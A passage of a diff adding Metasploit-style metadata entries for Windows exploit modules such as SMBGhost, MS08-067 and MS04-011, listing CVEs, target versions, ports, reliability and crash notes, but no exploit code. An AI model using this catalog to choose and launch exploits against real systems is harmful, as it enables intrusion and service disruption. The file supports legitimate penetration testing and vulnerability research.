false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sip/sipxphone_cseq": { + "name": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", + "fullname": "exploit/windows/sip/sipxphone_cseq", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", + "references": [ + "CVE-2006-3524", + "OSVDB-27122", + "BID-18906" + ], + "platform": "Windows", + "arch": "", + "rport": 5060, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SIPfoundry sipXphone 2.6.0.27 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/sip/sipxphone_cseq.rb", + "is_install_path": true, + "ref_name": "windows/sip/sipxphone_cseq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/cve_2020_0796_smbghost": { + "name": "SMBv3 Compression Buffer Overflow", + "fullname": "exploit/windows/smb/cve_2020_0796_smbghost", + "aliases": [], + "rank": 200, + "disclosure_date": "2020-03-13", + "type": "exploit", + "author": [ + "hugeh0ge", + "chompie1337", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code\n in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. Exploitation\n can take a few minutes as the necessary data is gathered.", + "references": [ + "CVE-2020-0796", + "URL-https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html", + "URL-https://github.com/chompie1337/SMBGhost_RCE_PoC", + "URL-https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s", + "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems", + "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows", + "URL-https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1903-1909 x64" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", + "is_install_path": true, + "ref_name": "windows/smb/cve_2020_0796_smbghost", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "SMBGhost", + "CoronaBlue" + ], + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "RelatedModules": [ + "exploit/windows/local/cve_2020_0796_smbghost" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/generic_smb_dll_injection": { + "name": "Generic DLL Injection From Shared Resource", + "fullname": "exploit/windows/smb/generic_smb_dll_injection", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-03-04", + "type": "exploit", + "author": [ + "Matthew Hall " + ], + "description": "This is a general-purpose module for exploiting conditions where a DLL can be loaded\n from a specified SMB share. This module serves payloads as DLLs over an SMB service.", + "references": [ + "CWE-114" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/generic_smb_dll_injection.rb", + "is_install_path": true, + "ref_name": "windows/smb/generic_smb_dll_injection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/group_policy_startup": { + "name": "Group Policy Script Execution From Shared Resource", + "fullname": "exploit/windows/smb/group_policy_startup", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-01-26", + "type": "exploit", + "author": [ + "Sam Bertram ", + "juan vazquez " + ], + "description": "This is a general-purpose module for exploiting systems with Windows Group Policy\n configured to load VBS startup/logon scripts from remote locations. This module runs\n a SMB shared resource that will provide a payload through a VBS file. Startup scripts\n will be executed with SYSTEM privileges, while logon scripts will be executed with the\n user privileges. Have into account which the attacker still needs to redirect the\n target traffic to the fake SMB share to exploit it successfully. Please note in some\n cases, it will take 5 to 10 minutes to receive a session.", + "references": [ + "URL-http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html", + "URL-https://github.com/GDSSecurity/BadSamba" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/group_policy_startup.rb", + "is_install_path": true, + "ref_name": "windows/smb/group_policy_startup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "badsamba" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ipass_pipe_exec": { + "name": "IPass Control Pipe Remote Command Execution", + "fullname": "exploit/windows/smb/ipass_pipe_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-01-21", + "type": "exploit", + "author": [ + "Matthias Kaiser", + "h0ng10 " + ], + "description": "This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused\n to force the service to load a DLL from a SMB share.", + "references": [ + "CVE-2015-0925", + "OSVDB-117423", + "BID-72265", + "URL-http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows x32", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb", + "is_install_path": true, + "ref_name": "windows/smb/ipass_pipe_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms03_049_netapi": { + "name": "MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow", + "fullname": "exploit/windows/smb/ms03_049_netapi", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-11-11", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n function using the Workstation service in Windows XP.", + "references": [ + "CVE-2003-0812", + "OSVDB-11461", + "BID-9011", + "MSB-MS03-049" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows XP SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms03_049_netapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms03_049_netapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms04_007_killbill": { + "name": "MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow", + "fullname": "exploit/windows/smb/ms04_007_killbill", + "aliases": [], + "rank": 100, + "disclosure_date": "2004-02-10", + "type": "exploit", + "author": [ + "Solar Eclipse " + ], + "description": "This is an exploit for a previously undisclosed\n vulnerability in the bit string decoding code in the\n Microsoft ASN.1 library. This vulnerability is not related\n to the bit string vulnerability described in eEye advisory\n AD20040210-2. Both vulnerabilities were fixed in the\n MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this\n vulnerability.\n\n You are only allowed one attempt with this vulnerability. If\n the payload fails to execute, the LSASS system service will\n crash and the target system will automatically reboot itself\n in 60 seconds. If the payload succeeds, the system will no\n longer be able to process authentication requests, denying\n all attempts to login through SMB or at the console. A\n reboot is required to restore proper functioning of an\n exploited system.\n\n This exploit has been successfully tested with the win32/*/reverse_tcp\n payloads, however a few problems were encountered when using the\n equivalent bind payloads. Your mileage may vary.", + "references": [ + "CVE-2003-0818", + "OSVDB-3902", + "BID-9633", + "MSB-MS04-007" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP2-SP4 + Windows XP SP0-SP1" + ], + "mod_time": "2022-07-10 00:07:26 +0000", + "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms04_007_killbill", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "kill-bill" + ], + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "crash-os-restarts", + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms04_011_lsass": { + "name": "MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow", + "fullname": "exploit/windows/smb/ms04_011_lsass", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-04-13", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the LSASS service, this vulnerability\n was originally found by eEye. When re-exploiting a Windows XP system, you will need\n need to run this module twice. DCERPC request fragmentation can be performed by setting\n 'FragSize' parameter.", + "references": [ + "CVE-2003-0533", + "OSVDB-5248", + "BID-10108", + "MSB-MS04-011" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targetting", + "Windows 2000 English", + "Windows XP English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms04_011_lsass.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms04_011_lsass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms04_031_netdde": { + "name": "MS04-031 Microsoft NetDDE Service Overflow", + "fullname": "exploit/windows/smb/ms04_031_netdde", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-10-12", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack buffer overflow in the NetDDE service, which is the\n precursor to the DCOM interface. This exploit effects only operating systems\n released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n that this vulnerability can be exploited without authentication, the NDDEAPI\n pipe is only accessible after successful authentication.", + "references": [ + "CVE-2004-0206", + "OSVDB-10689", + "BID-11372", + "MSB-MS04-031" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms04_031_netdde.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms04_031_netdde", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms05_039_pnp": { + "name": "MS05-039 Microsoft Plug and Play Service Overflow", + "fullname": "exploit/windows/smb/ms05_039_pnp", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-08-09", + "type": "exploit", + "author": [ + "hdm ", + "cazz " + ], + "description": "This module exploits a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account.\n\n NOTE: Since the PnP service runs inside the service.exe process, a failed\n exploit attempt will cause the system to automatically reboot.", + "references": [ + "CVE-2005-1983", + "OSVDB-18605", + "BID-14513", + "MSB-MS05-039" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP0-SP4", + "Windows 2000 SP4 French", + "Windows 2000 SP4 Spanish", + "Windows 2000 SP4 Universal", + "Windows 2000 SP0-SP4 German", + "Windows 2000 SP0-SP4 Italian", + "Windows XP SP1 English", + "Windows XP SP2 English (Requires Admin)", + "Windows Server 2003 SP0 English (Requires Admin)", + "Windows Server 2003 SP1 English (Requires Admin)" + ], + "mod_time": "2021-11-28 13:39:05 +0000", + "path": "/modules/exploits/windows/smb/ms05_039_pnp.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms05_039_pnp", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_025_rasmans_reg": { + "name": "MS06-025 Microsoft RRAS Service RASMAN Registry Overflow", + "fullname": "exploit/windows/smb/ms06_025_rasmans_reg", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-06-13", + "type": "exploit", + "author": [ + "pusscat ", + "hdm " + ], + "description": "This module exploits a registry-based stack buffer overflow in the Windows Routing\n and Remote Access Service. Since the service is hosted inside svchost.exe,\n a failed exploit attempt can cause other system services to fail as well.\n A valid username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n Exploiting this flaw involves two distinct steps - creating the registry key\n and then triggering an overwrite based on a read of this key. Once the key is\n created, it cannot be recreated. This means that for any given system, you\n only get one chance to exploit this flaw. Picking the wrong target will require\n a manual removal of the following registry key before you can try again:\n HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook", + "references": [ + "CVE-2006-2370", + "OSVDB-26437", + "BID-18325", + "MSB-MS06-025" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_025_rasmans_reg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_025_rras": { + "name": "MS06-025 Microsoft RRAS Service Overflow", + "fullname": "exploit/windows/smb/ms06_025_rras", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-06-13", + "type": "exploit", + "author": [ + "Nicolas Pouvesle ", + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the Windows Routing and Remote\n Access Service. Since the service is hosted inside svchost.exe, a failed\n exploit attempt can cause other system services to fail as well. A valid\n username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.", + "references": [ + "CVE-2006-2370", + "OSVDB-26437", + "BID-18325", + "MSB-MS06-025" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "Windows 2000 SP4", + "Windows XP SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_025_rras.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_025_rras", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_040_netapi": { + "name": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow", + "fullname": "exploit/windows/smb/ms06_040_netapi", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-08-08", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.", + "references": [ + "CVE-2006-3439", + "OSVDB-27845", + "BID-19409", + "MSB-MS06-040" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)", + "(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4", + "(wcscpy) Windows XP SP0/SP1", + "(stack) Windows XP SP1 English", + "(stack) Windows XP SP1 Italian", + "(wcscpy) Windows 2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_040_netapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "crash-os-restarts", + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_066_nwapi": { + "name": "MS06-066 Microsoft Services nwapi32.dll Module Exploit", + "fullname": "exploit/windows/smb/ms06_066_nwapi", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.", + "references": [ + "CVE-2006-4688", + "OSVDB-30260", + "BID-21023", + "MSB-MS06-066" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_066_nwapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_066_nwapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_066_nwwks": { + "name": "MS06-066 Microsoft Services nwwks.dll Module Exploit", + "fullname": "exploit/windows/smb/ms06_066_nwwks", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack buffer overflow in the svchost service, when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.", + "references": [ + "CVE-2006-4688", + "OSVDB-30260", + "BID-21023", + "MSB-MS06-066" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_066_nwwks.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_066_nwwks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_070_wkssvc": { + "name": "MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow", + "fullname": "exploit/windows/smb/ms06_070_wkssvc", + "aliases": [], + "rank": 0, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n In order to exploit this vulnerability, you must specify the name of a\n valid Windows DOMAIN. It may be possible to satisfy this condition by using\n a custom DNS and LDAP setup, however that method is not covered here.\n\n Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n credentials are required to reach the vulnerable code. Windows XP SP1 only\n requires valid user credentials. Also, testing shows that a machine already\n joined to a domain is not exploitable.", + "references": [ + "CVE-2006-4691", + "OSVDB-30263", + "BID-20985", + "MSB-MS06-070" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targetting", + "Windows 2000 SP4", + "Windows XP SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_070_wkssvc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms07_029_msdns_zonename": { + "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)", + "fullname": "exploit/windows/smb/ms07_029_msdns_zonename", + "aliases": [], + "rank": 0, + "disclosure_date": "2007-04-12", + "type": "exploit", + "author": [ + "hdm ", + "Unknown", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2. This module exploits the\n RPC service using the \\DNSSERVER pipe available via SMB. This\n pipe requires a valid user account to access, so the SMBUSER\n and SMBPASS options must be specified.", + "references": [ + "CVE-2007-1748", + "OSVDB-34100", + "MSB-MS07-029" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", + "Windows 2000 Server SP0-SP4+ English", + "Windows 2000 Server SP0-SP4+ French", + "Windows 2000 Server SP0-SP4+ German", + "Windows 2000 Server SP0-SP4+ Italian", + "Windows 2000 Server SP0-SP4+ Polish", + "Windows 2000 Server SP0-SP4+ Portuguese", + "Windows 2000 Server SP0-SP4+ Korean", + "Windows 2000 Server SP0-SP4+ Russian", + "Windows 2000 Server SP0-SP4+ Simplified Chinese", + "Windows 2000 Server SP0-SP4+ Spanish", + "Windows 2000 Server SP0-SP4+ Swedish", + "Windows 2000 Server SP0-SP4+ Traditional Chinese", + "Windows 2000 Server SP0-SP4+ Turkish", + "Windows 2003 Server SP0 English", + "Windows 2003 Server SP0 French", + "Windows 2003 Server SP1-SP2 English", + "Windows 2003 Server SP1-SP2 French", + "Windows 2003 Server SP1-SP2 Spanish", + "Windows 2003 Server SP1-SP2 Italian", + "Windows 2003 Server SP1-SP2 German", + "Windows 2003 Server SP1-SP2 Russian", + "Windows 2003 Server SP1-SP2 Simplified Chinese" + ], + "mod_time": "2021-11-30 07:38:08 +0000", + "path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms07_029_msdns_zonename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms08_067_netapi": { + "name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption", + "fullname": "exploit/windows/smb/ms08_067_netapi", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-10-28", + "type": "exploit", + "author": [ + "hdm ", + "Brett Moore ", + "frank2 ", + "jduck " + ], + "description": "This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.", + "references": [ + "CVE-2008-4250", + "OSVDB-49243", + "MSB-MS08-067", + "URL-https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targeting", + "Windows 2000 Universal", + "Windows XP SP0/SP1 Universal", + "Windows 2003 SP0 Universal", + "Windows XP SP2 English (AlwaysOn NX)", + "Windows XP SP2 English (NX)", + "Windows XP SP3 English (AlwaysOn NX)", + "Windows XP SP3 English (NX)", + "Windows XP SP2 Arabic (NX)", + "Windows XP SP2 Chinese - Traditional / Taiwan (NX)", + "Windows XP SP2 Chinese - Simplified (NX)", + "Windows XP SP2 Chinese - Traditional (NX)", + "Windows XP SP2 Czech (NX)", + "Windows XP SP2 Danish (NX)", + "Windows XP SP2 German (NX)", + "Windows XP SP2 Greek (NX)", + "Windows XP SP2 Spanish (NX)", + "Windows XP SP2 Finnish (NX)", + "Windows XP SP2 French (NX)", + "Windows XP SP2 Hebrew (NX)", + "Windows XP SP2 Hungarian (NX)", + "Windows XP SP2 Italian (NX)", + "Windows XP SP2 Japanese (NX)", + "Windows XP SP2 Korean (NX)", + "Windows XP SP2 Dutch (NX)", + "Windows XP SP2 Norwegian (NX)", + "Windows XP SP2 Polish (NX)", + "Windows XP SP2 Portuguese - Brazilian (NX)", + "Windows XP SP2 Portuguese (NX)", + "Windows XP SP2 Russian (NX)", + "Windows XP SP2 Swedish (NX)", + "Windows XP SP2 Turkish (NX)", + "Windows XP SP3 Arabic (NX)", + "Windows XP SP3 Chinese - Traditional / Taiwan (NX)", + "Windows XP SP3 Chinese - Simplified (NX)", + "Windows XP SP3 Chinese - Traditional (NX)", + "Windows XP SP3 Czech (NX)", + "Windows XP SP3 Danish (NX)", + "Windows XP SP3 German (NX)", + "Windows XP SP3 Greek (NX)", + "Windows XP SP3 Spanish (NX)", + "Windows XP SP3 Finnish (NX)", + "Windows XP SP3 French (NX)", + "Windows XP SP3 Hebrew (NX)", + "Windows XP SP3 Hungarian (NX)", + "Windows XP SP3 Italian (NX)", + "Windows XP SP3 Japanese (NX)", + "Windows XP SP3 Korean (NX)", + "Windows XP SP3 Dutch (NX)", + "Windows XP SP3 Norwegian (NX)", + "Windows XP SP3 Polish (NX)", + "Windows XP SP3 Portuguese - Brazilian (NX)", + "Windows XP SP3 Portuguese (NX)", + "Windows XP SP3 Russian (NX)", + "Windows XP SP3 Swedish (NX)", + "Windows XP SP3 Turkish (NX)", + "Windows 2003 SP1 English (NO NX)", + "Windows 2003 SP1 English (NX)", + "Windows 2003 SP1 Japanese (NO NX)", + "Windows 2003 SP1 Spanish (NO NX)", + "Windows 2003 SP1 Spanish (NX)", + "Windows 2003 SP1 French (NO NX)", + "Windows 2003 SP1 French (NX)", + "Windows 2003 SP2 English (NO NX)", + "Windows 2003 SP2 English (NX)", + "Windows 2003 SP2 German (NO NX)", + "Windows 2003 SP2 German (NX)", + "Windows 2003 SP2 Portuguese (NX)", + "Windows 2003 SP2 Portuguese - Brazilian (NX)", + "Windows 2003 SP2 Spanish (NO NX)", + "Windows 2003 SP2 Spanish (NX)", + "Windows 2003 SP2 Japanese (NO NX)", + "Windows 2003 SP2 French (NO NX)", + "Windows 2003 SP2 French (NX)", + "Windows 2003 SP2 Chinese - Simplified (NX)", + "Windows 2003 SP2 Czech (NX)", + "Windows 2003 SP2 Dutch (NX)", + "Windows 2003 SP2 Hungarian (NX)", + "Windows 2003 SP2 Italian (NX)", + "Windows 2003 SP2 Russian (NX)", + "Windows 2003 SP2 Swedish (NX)", + "Windows 2003 SP2 Turkish (NX)" + ], + "mod_time": "2023-07-10 16:54:42 +0000", + "path": "/modules/exploits/windows/smb/ms08_067_netapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms08_067_netapi", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms09_050_smb2_negotiate_func_index": { + "name": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", + "fullname": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-09-07", + "type": "exploit", + "author": [ + "Laurent Gaffie ", + "hdm ", + "sf " + ], + "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.", + "references": [ + "MSB-MS09-050", + "CVE-2009-3103", + "BID-36299", + "OSVDB-57799", + "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows Vista SP1/SP2 and Server 2008 (x86)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms10_046_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/smb/ms10_046_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-07-16", + "type": "exploit", + "author": [ + "hdm ", + "jduck ", + "B_H" + ], + "description": "This module exploits a 